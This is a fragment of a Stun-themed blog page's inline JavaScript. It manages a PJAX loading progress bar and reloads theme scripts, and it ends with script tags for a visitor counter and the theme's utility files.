  // 加载进度条的计时器
  var loadingTimer = null;

  // 重置页面 Y 方向上的滚动偏移量
  document.addEventListener('pjax:send', function () {
    $('.header-nav-menu').removeClass('show');
    if (CONFIG.pjax && CONFIG.pjax.avoidBanner) {
      $('html').velocity('scroll', {
        duration: 500,
        offset: $('#header').height(),
        easing: 'easeInOutCubic'
      });
    }

    var loadingBarWidth = 20;
    var MAX_LOADING_WIDTH = 95;

    $('.loading-bar').addClass('loading');
    $('.loading-bar__progress').css('width', loadingBarWidth + '%');
    clearInterval(loadingTimer);
    loadingTimer = setInterval(function () {
      loadingBarWidth += 3;
      if (loadingBarWidth > MAX_LOADING_WIDTH) {
        loadingBarWidth = MAX_LOADING_WIDTH;
      }
      $('.loading-bar__progress').css('width', loadingBarWidth + '%');
    }, 500);
  }, false);

  window.addEventListener('pjax:complete', function () {
    clearInterval(loadingTimer);
    $('.loading-bar__progress').css('width', '100%');
    $('.loading-bar').removeClass('loading');
    setTimeout(function () {
      $('.loading-bar__progress').css('width', '0');
    }, 400);
    $('link[rel=prefetch], script[data-pjax-rm]').each(function () {
      $(this).remove();
    });
    $('script[data-pjax], #pjax-reload script').each(function () {
      $(this).parent().append($(this).remove());
    });

    if (Stun.utils.pjaxReloadBoot) {
      Stun.utils.pjaxReloadBoot();
    }
    if (Stun.utils.pjaxReloadScroll) {
      Stun.utils.pjaxReloadScroll();
    }
    if (Stun.utils.pjaxReloadSidebar) {
      Stun.utils.pjaxReloadSidebar();
    }
    if (false) {
      if (Stun.utils.pjaxReloadHeader) {
        Stun.utils.pjaxReloadHeader();
      }
      if (Stun.utils.pjaxReloadScrollIcon) {
        Stun.utils.pjaxReloadScrollIcon();
      }
      if (Stun.utils.pjaxReloadLocalSearch) {
        Stun.utils.pjaxReloadLocalSearch();
      }
    }
  }, false);
}, false);</script><div id="pjax-reload"><script src="https://cdn.jsdelivr.net/gh/sukkaw/busuanzi@latest/bsz.pure.mini.js" async></script></div><script src="/js/utils.js?v=2.1.1"></script><script src="/js/stun-boot.js?v=2.1.1"></script><script src="/js/scroll.js?v=2.1.1"></script><script src="/js/header.js?v=2.1.1"></script><script src="/js/sidebar.js?v=2.1.1"></script></body></html>